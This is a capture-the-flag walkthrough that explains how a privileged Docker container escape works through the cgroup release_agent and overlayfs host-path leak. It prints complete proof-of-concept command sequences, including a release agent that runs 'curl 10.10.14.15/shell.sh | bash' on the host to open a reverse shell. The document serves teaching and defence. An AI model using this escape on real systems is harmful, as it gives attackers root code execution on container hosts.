Digging into cgroups Escape
The method I used in Ready to get code execution on the host system from a privileged Docker container was a series of bash commands that didn’t make any sense at first glance. I wanted to dive into them and see what was happening under the hood.
Background
POCs
The privileged Docker container escape POC I used looked like this:
root@gitlab:~# d=`dirname $(ls -x /s*/fs/c*/*/r* |head -n1)`
root@gitlab:~# mkdir -p $d/w;echo 1 >$d/w/notify_on_release
root@gitlab:~# t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
root@gitlab:~# echo $t/c >$d/release_agent;printf '#!/bin/sh\ncurl 10.10.14.15/shell.sh | bash' >/c;
root@gitlab:~# chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";
To explain how this works, I’ll use a slightly different version of the POC (from the same article) because it’s a bit easier to follow:
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
Both POCs take the same steps:
- Find or create access to the RDMA cgroup controller.
- Create a new cgroup within that controller.
- Register notify_on_release for that cgroup, and set the release agent to a file accessible from both the container and the host.
- Start a quickly completing process within that cgroup that triggers execution of the release agent on termination.
cgroups
The first thing to understand is the idea of cgroups. It’s a Linux kernel feature that limits and accounts for CPU (and other resource) usage for a collection of processes within the cgroup. Julia Evans has a zine describing cgroups.
cgroups are not exclusive to Docker, but they are used by Docker. This neat Medium post on Docker Internals goes into a lot more detail about how Docker uses cgroups for resource allocation.
overlayfs
The other concept that comes into play here is overlayfs, a “union mount filesystem” implementation in Linux. In overlayfs, there are two directories, upper and lower, that are merged to create another directory that represents the combination of the two. Julia Evans has another really helpful zine for overlayfs (she’s such a good resource!).
Julia has a post that goes into more detail with examples as well. The idea is that you can mount two file paths such that they create a third merged result. For example, the lower might be a container base image, and the upper might be changes made inside the container. In the merged result, if the file exists in both upper and lower, it shows the one from upper. If it doesn’t exist in upper, it shows the one from lower.
What’s important to know here is that by leaking the host’s filepath to the upper directory used for the docker container, I can write something in the container, and know where it will be on the host.
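The upper-over-lower rule described above can be sketched without mounting anything. This is only a simulation with plain directories, not real overlayfs: merged_cat is a hypothetical helper I made up for illustration, the file names are arbitrary, and details like whiteouts (deleted files) are ignored.

```shell
#!/bin/sh
# Simulate the overlayfs lookup order with two ordinary directories.
demo=$(mktemp -d)
mkdir -p "$demo/lower" "$demo/upper"

echo "from image"     > "$demo/lower/only_lower.txt"   # exists only in lower
echo "from image"     > "$demo/lower/both.txt"         # exists in both layers
echo "from container" > "$demo/upper/both.txt"

# merged_cat (hypothetical): show the file the merged view would expose.
# upper wins if the file exists there, otherwise fall back to lower.
merged_cat() {
    if [ -e "$demo/upper/$1" ]; then
        cat "$demo/upper/$1"
    else
        cat "$demo/lower/$1"
    fi
}

both=$(merged_cat both.txt)
only_lower=$(merged_cat only_lower.txt)
echo "both.txt       -> $both"
echo "only_lower.txt -> $only_lower"

rm -rf "$demo"
```

Anything written inside the container lands in upper, which is why knowing the host path of upper is enough to locate a file from the host side.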
Steps
Find / Create cgroup Controller
The first two commands (of three) on the first line of the POC create a directory and mount an RDMA cgroup controller on it (mount -t cgroup -o rdma):
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
It uses the RDMA cgroup, but others would work as well (there’s a list in the cgroups man page). In the Trail of Bits post, they show an error that comes up when there is no RDMA cgroup, and suggest changing rdma to memory to continue with another controller.
The original POC finds an existing mount of the rdma cgroup controller using a somewhat obfuscated ls command:
root@gitlab:~# dirname $(ls -x /s*/fs/c*/*/r* |head -n1)
/sys/fs/cgroup/rdma
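To see how that glob resolves, here is a small sketch that rebuilds a fake layout under a temporary directory and runs the same pattern against it. The directory tree is my own stand-in (only the rdma directory gets an entry starting with r, mirroring the output above), so it shows how the pattern expands rather than what any particular system contains.

```shell
#!/bin/sh
# Build a minimal, fake /sys/fs/cgroup tree under a temp dir.
root=$(mktemp -d)
mkdir -p "$root/sys/fs/cgroup/rdma" "$root/sys/fs/cgroup/memory"
touch "$root/sys/fs/cgroup/rdma/release_agent"    # matches r*
touch "$root/sys/fs/cgroup/memory/cgroup.procs"   # does not match r*

# Same glob as the POC, just rooted at $root:
#   s*  -> sys
#   c*  -> cgroup
#   *   -> every controller directory
#   r*  -> entries starting with "r", such as release_agent
d=$(dirname "$(ls -x "$root"/s*/fs/c*/*/r* | head -n1)")
echo "$d"

rm -rf "$root"
```

The dirname call strips the matched file name, leaving the controller directory that the rest of the POC works in.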
cgroup controllers are global resources, so mounting one again inside the container gives access to the same controller the host uses. Changes made here will be reflected in the host’s RDMA controller. Without being privileged, a container won’t have access to this.
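A rough way to tell whether a shell is in a position to try this is to look at its effective capabilities. The sketch below assumes CAP_SYS_ADMIN (bit 21 of the mask) is the capability of interest, since mount requires it. has_cap_sys_admin is a hypothetical helper, and the two sample masks are values commonly seen for privileged and default Docker containers, not output from Ready.

```shell
#!/bin/sh
# has_cap_sys_admin (hypothetical): takes a hex capability mask in the
# CapEff format from /proc/<pid>/status and tests bit 21 (CAP_SYS_ADMIN).
has_cap_sys_admin() {
    [ $(( 0x$1 & (1 << 21) )) -ne 0 ]
}

# Sample masks (assumptions for illustration):
full_mask=000001ffffffffff      # every capability bit up to 40 set
default_mask=00000000a80425fb   # commonly seen in a default Docker container

for mask in "$full_mask" "$default_mask"; do
    if has_cap_sys_admin "$mask"; then
        echo "$mask: CAP_SYS_ADMIN present"
    else
        echo "$mask: CAP_SYS_ADMIN missing"
    fi
done

# Check the current process as well, when /proc is available.
if [ -r /proc/self/status ]; then
    cap_eff=$(awk '/^CapEff:/ {print $2}' /proc/self/status)
    if [ -n "$cap_eff" ] && has_cap_sys_admin "$cap_eff"; then
        echo "this shell has CAP_SYS_ADMIN"
    else
        echo "this shell lacks CAP_SYS_ADMIN"
    fi
fi
```

Having the capability is necessary for the mount but may not be sufficient on its own, since seccomp or AppArmor profiles can still block it.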
Create New cgroup
Next, each POC creates a cgroup (directory) in that mount, x (or w in the original POC):
mkdir /tmp/cgrp/x
or
mkdir -p $d/w;
Just creating the directory is enough for the kernel to populate it with several files:
root@gitlab:~# ls /tmp/cgrp/x/
cgroup.clone_children notify_on_release rdma.max
cgroup.procs rdma.current tasks
Configure Release
The next command writes a 1 to notify_on_release, which enables cgroup notifications on release:
If the notify_on_release flag is enabled (1) in a cgroup, then whenever the last task in the cgroup leaves (exits or attaches to some other cgroup) and the last child cgroup of that cgroup is removed, then the kernel runs the command specified by the contents of the "release_agent" file in that hierarchy's root directory, supplying the pathname (relative to the mount point of the cgroup file system) of the abandoned cgroup.
In each POC:
echo 1 > /tmp/cgrp/x/notify_on_release
or
echo 1 >$d/w/notify_on_release
Most of the remaining commands are dedicated to setting the release agent, which is what gets run on the release notification. First, the POC needs to find the mapping so that the host can reference a file written in the container. /etc/mtab lists all the mount points for the system, including the overlayfs mount:
root@gitlab:~# grep upper /etc/mtab
overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/GIXQ4D2FJ63I5OGALTCGDBK6KT:/var/lib/docker/overlay2/l/PZB5MARGIAOF6N5AAJNTVUFS52:/var/lib/docker/overlay2/l/4KSUGTOLFYSBJFJQH2NUGVL54R:/var/lib/docker/overlay2/l/PJ4IKL6MDRM2ZSGFRAXCVHVLUR:/var/lib/docker/overlay2/l/XLLFVBBMKEEE672BOIVTSZ5XQZ:/var/lib/docker/overlay2/l/33JTQXWWPTNINADNR6R3YM47KY:/var/lib/docker/overlay2/l/XG5BUSKVZNINSBJD2J7MMLU5A3:/var/lib/docker/overlay2/l/ZI5Y7RO6WUTDK3DQVTUTOA2ZWI:/var/lib/docker/overlay2/l/SRZJCUXAPFOW35HRDPW7OHQWXN:/var/lib/docker/overlay2/l/SLR2WWC4VRYMZRPZ6EHZQSLNYS:/var/lib/docker/overlay2/l/SJBEI24D42KKTO5Z54GMKQPPXO,upperdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff,workdir=/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/work,xino=off 0 0
The next command in the POC uses sed to extract just the upperdir path:
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
Running that shows where on the host filesystem the container files are:
root@gitlab:~# sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab
/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff
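To make the sed step easier to follow, here is a minimal sketch run against a shortened, made-up mtab entry (the AAAA, BBBB, and abc123 path components are placeholders, not real layer IDs). It spells the pattern out as upperdir= instead of the POC’s \perdir=, which I’m assuming is just a terser way of matching the same text.

```shell
#!/bin/sh
# Hypothetical, shortened overlay entry in /etc/mtab format.
sample='overlay / overlay rw,relatime,lowerdir=/var/lib/docker/overlay2/l/AAAA:/var/lib/docker/overlay2/l/BBBB,upperdir=/var/lib/docker/overlay2/abc123/diff,workdir=/var/lib/docker/overlay2/abc123/work,xino=off 0 0'

# -n plus the trailing p prints only lines where the substitution matched.
# \([^,]*\) captures everything after "upperdir=" up to the next comma,
# and \1 replaces the whole line with just that capture.
host_path=$(printf '%s\n' "$sample" | sed -n 's/.*upperdir=\([^,]*\).*/\1/p')
echo "$host_path"

# The POC then appends the script name to get the path the host will run.
release_agent_path="$host_path/cmd"
echo "$release_agent_path"
```

Lines without an upperdir option produce no output at all, so the result is empty on a system that isn’t using overlayfs for its root.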
As an experiment, I’ll create a file in the root home dir on the container:
root@gitlab:~# echo "0xdf was here" > 0xdf
With an SSH shell as root on the host, I can see that the file shows up in the upperdir:
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# ls
bin etc home opt root root_pass run tmp usr var
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff# cd root/
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# ls
0xdf
root@ready:/var/lib/docker/overlay2/72682da51e1ec80c609bc446d141ff5afed2037d1bdf2810550ecff7fb552e68/diff/root# cat 0xdf
0xdf was here
This helps because now I can write the release agent script (a simple reverse shell) in the container, and then have the host execute it. That’s what the next few commands do. First, set the file’s path from the host’s perspective as the release_agent:
echo "$host_path/cmd" > /tmp/cgrp/release_agent
Write the reverse shell from within the container:
echo '#!/bin/sh' > /cmd
echo "curl 10.10.14.15/shell.sh | bash" >> /cmd
chmod a+x /cmd
Trigger Release
Now everything is set up so that when the last process within this new cgroup terminates, the host will execute the reverse shell. All I need to do now is start a process within that cgroup and then let it finish. The POC makes use of a neat trick to do that. It starts a short-lived sh process, and has that process write its own PID into the cgroup.procs file:
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
This puts the PID in that file, and then the sh process exits. Once that PID is gone, the x cgroup is empty, so the kernel drops it from cgroup.procs and, because notify_on_release is set, runs the release agent on the host.
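One detail worth checking is which shell expands $$. Inside double quotes the calling shell substitutes it before sh ever starts, so it has to be escaped (or single-quoted) for the child to report its own PID. The sketch below doesn’t touch cgroups at all and the variable names are mine. It only compares the two forms.

```shell
#!/bin/sh
parent_pid=$$

# Unescaped inside double quotes: the calling shell expands $$ first,
# so the child just echoes the parent's PID.
expanded_by_parent=$(sh -c "echo $$")

# Escaped: the literal text $$ reaches the child sh, which expands it
# to its own PID.
expanded_by_child=$(sh -c "echo \$\$")

echo "parent shell PID:    $parent_pid"
echo "unescaped \$\$ gives:  $expanded_by_parent"
echo "escaped \$\$ gives:    $expanded_by_child"
```

As I understand it, if the calling shell’s PID is what lands in cgroup.procs, that shell moves into the cgroup instead, and the release agent would not fire until it (and anything it started afterwards) has exited.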